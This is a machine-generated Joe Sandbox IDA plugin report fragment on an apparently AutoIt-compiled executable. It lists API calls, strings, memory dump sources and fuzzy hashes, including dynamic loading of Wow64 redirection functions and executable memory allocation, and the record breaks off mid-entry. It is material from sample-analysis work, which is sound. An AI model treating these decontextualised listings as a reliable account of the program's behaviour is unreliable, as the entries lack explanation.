                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: c4746be483fdea7c1515d09a7b7cc3e5773f0141b97a75398a1dc97da299a574
                                                    • Instruction ID: d01759a7936ab458084564056dc2a540d28b80b5fab7c56d7ace6db2a44a8201
                                                    • Opcode Fuzzy Hash: c4746be483fdea7c1515d09a7b7cc3e5773f0141b97a75398a1dc97da299a574
                                                    • Instruction Fuzzy Hash: 50016230500704AFEB215B20DD4EF9677BAFF04716F001769F942A15E1EBE5A9998F90
                                                    APIs
                                                    • EndPath.GDI32(?), ref: 006013BF
                                                    • StrokeAndFillPath.GDI32(?,?,0063BAD8,00000000,?), ref: 006013DB
                                                    • SelectObject.GDI32(?,00000000), ref: 006013EE
                                                    • DeleteObject.GDI32 ref: 00601401
                                                    • StrokePath.GDI32(?), ref: 0060141C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: cb88ee36fb4e99f0248f5dbadc284000db715c6d0d1fc5bddcf81f287449fe48
                                                    • Instruction ID: 5706e7da9b02b5fad1acdce3c448c7f157e392024bc6d3c3f45f21ee1e22e40f
                                                    • Opcode Fuzzy Hash: cb88ee36fb4e99f0248f5dbadc284000db715c6d0d1fc5bddcf81f287449fe48
                                                    • Instruction Fuzzy Hash: 04F0C430055608EFDB295F26EC1CBA93BE7AB02326F14A324F469891F1C73589A5DF64
                                                    APIs
                                                      • Part of subcall function 00620FF6: std::exception::exception.LIBCMT ref: 0062102C
                                                      • Part of subcall function 00620FF6: __CxxThrowException@8.LIBCMT ref: 00621041
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 00607BB1: _memmove.LIBCMT ref: 00607C0B
                                                    • __swprintf.LIBCMT ref: 0061302D
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00612EC6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 1943609520-557222456
                                                    • Opcode ID: 4a5a2446f498a4dd92d7d2ace7262dddcb7c46e571bad4448f3b5980c5f75408
                                                    • Instruction ID: a779c69f7aef7ce3ca77db323e5fdacab300c49302830bfd0f67f1a3fc3e8f99
                                                    • Opcode Fuzzy Hash: 4a5a2446f498a4dd92d7d2ace7262dddcb7c46e571bad4448f3b5980c5f75408
                                                    • Instruction Fuzzy Hash: 46919F715087159FC758EF24D885CAFB7E6EF99700F04091DF4829B2A1DB20EE89CB56
                                                    APIs
                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0065B981
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ContainedObject
                                                    • String ID: AutoIt3GUI$Container$%i
                                                    • API String ID: 3565006973-3322876330
                                                    • Opcode ID: 7aa57b9a40217574d070cae4a7ffb023d62ec5d4678e56d9ebb3b5f11ea0d04a
                                                    • Instruction ID: cf97640c92351b59647cee7fa5cd9419f6fe94b5bb2b623a1f635e46f809ca07
                                                    • Opcode Fuzzy Hash: 7aa57b9a40217574d070cae4a7ffb023d62ec5d4678e56d9ebb3b5f11ea0d04a
                                                    • Instruction Fuzzy Hash: E2916A70600601AFDB64CF24C884AAABBEAFF49711F10956DFD0ACB391DB70E845CB60
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 006252DD
                                                      • Part of subcall function 00630340: __87except.LIBCMT ref: 0063037B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorHandling__87except__start
                                                    • String ID: pow
                                                    • API String ID: 2905807303-2276729525
                                                    • Opcode ID: e6053d62909026b3205b839d2f4a0c684c927f0dfd7c928fffac8ad28f5e9031
                                                    • Instruction ID: 8ce959779fda34017f5325f51c1db4b89e8faea5abf9241421b0d9d42db2ad42
                                                    • Opcode Fuzzy Hash: e6053d62909026b3205b839d2f4a0c684c927f0dfd7c928fffac8ad28f5e9031
                                                    • Instruction Fuzzy Hash: 27516A21E1DE02D6E720BB14E9213FE27D79B00350F209959E486813E6EF74CED89EC6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #$+
                                                    • API String ID: 0-2552117581
                                                    • Opcode ID: 0121ac080f048e77a51ccac037ff889563f14b0c6b04aa8f5c8a75c29a115ada
                                                    • Instruction ID: 6ce5c920461bdf8a288adbb38ccd91533f397e63abdb28a85a1bdf53fabf5aae
                                                    • Opcode Fuzzy Hash: 0121ac080f048e77a51ccac037ff889563f14b0c6b04aa8f5c8a75c29a115ada
                                                    • Instruction Fuzzy Hash: 71515136100A16DFDF14EF28D8986FA7BB6EF1A310F140155EC829B3A1D7309C4ACB64
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_free
                                                    • String ID: Oaa
                                                    • API String ID: 2620147621-3268679879
                                                    • Opcode ID: 03ae10bf13f7f404b0945be490a22744c62e3ba5bf642686489c83eed10a1b00
                                                    • Instruction ID: 063890b9e341ec029ff427bd2812afe144f1a901d8da8544f1b823b57eda840c
                                                    • Opcode Fuzzy Hash: 03ae10bf13f7f404b0945be490a22744c62e3ba5bf642686489c83eed10a1b00
                                                    • Instruction Fuzzy Hash: 07515D715087519FDB64CF28C441BABBBE6AF85314F08492DE98AC7351DB31EA41CB92
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memset$_memmove
                                                    • String ID: ERCP
                                                    • API String ID: 2532777613-1384759551
                                                    • Opcode ID: 526b1099e989f58e11ddfdd01ef70001a5acf339d01a2d579dd42095adcf1f7b
                                                    • Instruction ID: b165db7b405a28714cf560c4afe0e1a50fcba43a9984dbf31450c210473bd7d2
                                                    • Opcode Fuzzy Hash: 526b1099e989f58e11ddfdd01ef70001a5acf339d01a2d579dd42095adcf1f7b
                                                    • Instruction Fuzzy Hash: 4251C0759007199BDB24CF65C881BEABBFAEF04314F24856EE94ACB241E770A685CB40
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 006876D0
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006876E4
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00687708
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: 0ba3a64096bf6dfd964a1fea73ca3d98e2f5b66e57af33a6bdbbe05dbef73cc7
                                                    • Instruction ID: 2dc1e9d0c9e2ef5d3c90597d46b18b06b2b623584041fc96d508776f060411d4
                                                    • Opcode Fuzzy Hash: 0ba3a64096bf6dfd964a1fea73ca3d98e2f5b66e57af33a6bdbbe05dbef73cc7
                                                    • Instruction Fuzzy Hash: E721BF32500218BBDF119FA4CC42FEA3B6AEF48714F210214FE156B1D0DAB1E8918BA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00686FAA
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00686FBA
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00686FDF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: 41cf5be1fcd24d0c6bfd8adaabe91aa0ecbc42a6f8352402720850eb6839dd73
                                                    • Instruction ID: cfc1b07d0e9c4c2936573ed33c5781e90f0220cbb65779584219541acf19c205
                                                    • Opcode Fuzzy Hash: 41cf5be1fcd24d0c6bfd8adaabe91aa0ecbc42a6f8352402720850eb6839dd73
                                                    • Instruction Fuzzy Hash: 95219232610118BFDF119F54EC85EEB37ABEF89754F118224FA149B290CA71EC51CBA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 006879E1
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 006879F6
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00687A03
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: 0eceaa8c899b326327aae5105256cd6281a4d5ef2f04fb39895fd5af814d8371
                                                    • Instruction ID: d1f744a864d3e889e71320b515f9ed831903ec8fca5341ad3cd881cd142f0f05
                                                    • Opcode Fuzzy Hash: 0eceaa8c899b326327aae5105256cd6281a4d5ef2f04fb39895fd5af814d8371
                                                    • Instruction Fuzzy Hash: 6D112772244208BAEF14AF60CC05FEB37AEEF89764F110618F601A61D0D271D851CB20
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00604C2E), ref: 00604CA3
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00604CB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 2574300362-192647395
                                                    • Opcode ID: 833e844e9dd45b431138ca0731f901356d5a53f8e9421a5570f60ad1b288eace
                                                    • Instruction ID: b377c0d09a4e31a787ca125c3dc49bec3e813a44bbc9a38ce38e9c8e2da5acc1
                                                    • Opcode Fuzzy Hash: 833e844e9dd45b431138ca0731f901356d5a53f8e9421a5570f60ad1b288eace
                                                    • Instruction Fuzzy Hash: D3D01270550723DFD7205F31DA1868676D7AF05751F11893998C5D6290DA70D480C750
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00604D2E,?,00604F4F,?,006C62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604D6F
                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00604D81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-3689287502
                                                    • Opcode ID: b91dc905d178a63cc91eef0f72950d864919faca1be3be59e144a685f1eb5b39
                                                    • Instruction ID: 3b38f33c02d63af310a4647872fc6d156965c888310c9c97911ac250fe506aa6
                                                    • Opcode Fuzzy Hash: b91dc905d178a63cc91eef0f72950d864919faca1be3be59e144a685f1eb5b39
                                                    • Instruction Fuzzy Hash: 73D017B0650713DFD730AF31D80869676EAAF15762B129A3ED4C6D6290EAB0D8C0CB50
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00604CE1,?), ref: 00604DA2
                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00604DB4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-1355242751
                                                    • Opcode ID: f022c7b10ea794a584feb3c818acb994f471bfbb7a5520dfd72f412b6a1e88d2
                                                    • Instruction ID: b2836060923a5892dbeeb1ab6387556d526396b501520a907ebc295ee0e0e454
                                                    • Opcode Fuzzy Hash: f022c7b10ea794a584feb3c818acb994f471bfbb7a5520dfd72f412b6a1e88d2
                                                    • Instruction Fuzzy Hash: AAD017B1690713DFD730AF31D808A8676E7AF05755B12893AD8C6D6290EB70D8C0CB90
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,006812C1), ref: 00681080
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00681092
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: e6f0f674c2a4f6243685d9d7aaefddb7e7dbce33aaf5f9d8b64640dae77c1efc
                                                    • Instruction ID: 366590f867755cd42909b752956e4d5aab31a2ac1de8648a1f44e1cb2873e7d9
                                                    • Opcode Fuzzy Hash: e6f0f674c2a4f6243685d9d7aaefddb7e7dbce33aaf5f9d8b64640dae77c1efc
                                                    • Instruction Fuzzy Hash: 4AD01270510712DFD7305F35DC286A676EAAF05751B119E39A4C5DA250DBB0C4C0C750
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00679009,?,0068F910), ref: 00679403
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00679415
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                    • API String ID: 2574300362-199464113
                                                    • Opcode ID: 928f42dac3e3d96951fe012a8d4ac1396ee2c6218485400aab36eeb36fad573e
                                                    • Instruction ID: 0d4153efe2cb4e7cb2e99dc693ea71ea8729ee697e6c5902ef82452b951596d5
                                                    • Opcode Fuzzy Hash: 928f42dac3e3d96951fe012a8d4ac1396ee2c6218485400aab36eeb36fad573e
                                                    • Instruction Fuzzy Hash: CED01774650713DFD7209F71D90D68676E7AF06751B12C93AA4CAD6650EB70C8D0CB60
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: LocalTime__swprintf
                                                    • String ID: %.3d$WIN_XPe
                                                    • API String ID: 2070861257-2409531811
                                                    • Opcode ID: 81ee3edab24edc20f7d69a8718a1a3acfce3397b2637436f59e2bade913f07fe
                                                    • Instruction ID: 3b4ac26fca9209bd6a2f9ca9a62bb0756bf7176015d6d077028ca9b6f0702b66
                                                    • Opcode Fuzzy Hash: 81ee3edab24edc20f7d69a8718a1a3acfce3397b2637436f59e2bade913f07fe
                                                    • Instruction Fuzzy Hash: 35D012B180411CEACB449B909C548FA737EEB09311F101692B50699440F3349BC6DB25
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e4ef2cd05f147fedc889e15fa147ef0967b083d26cee3ea4d175a4b81814ca5d
                                                    • Instruction ID: b5644a4e9538b99f48d22a4013f937d65cc0997756c8950b8cf4fb3a01b712ab
                                                    • Opcode Fuzzy Hash: e4ef2cd05f147fedc889e15fa147ef0967b083d26cee3ea4d175a4b81814ca5d
                                                    • Instruction Fuzzy Hash: A7C15A74A04216EFCB14CF94D884AAEB7B6FF48711F118599E806EB351D730EE85CBA0
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 0067E3D2
                                                    • CharLowerBuffW.USER32(?,?), ref: 0067E415
                                                      • Part of subcall function 0067DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0067DAD9
                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0067E615
                                                    • _memmove.LIBCMT ref: 0067E628
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                    • String ID:
                                                    • API String ID: 3659485706-0
                                                    • Opcode ID: 9a259499665618f994bf1168570db088fd9417d223d230455070588c4d5d2d19
                                                    • Instruction ID: 68be7bcaf874bb4df59ef1e4e028310496f5892f9645e4d574024c67f720e795
                                                    • Opcode Fuzzy Hash: 9a259499665618f994bf1168570db088fd9417d223d230455070588c4d5d2d19
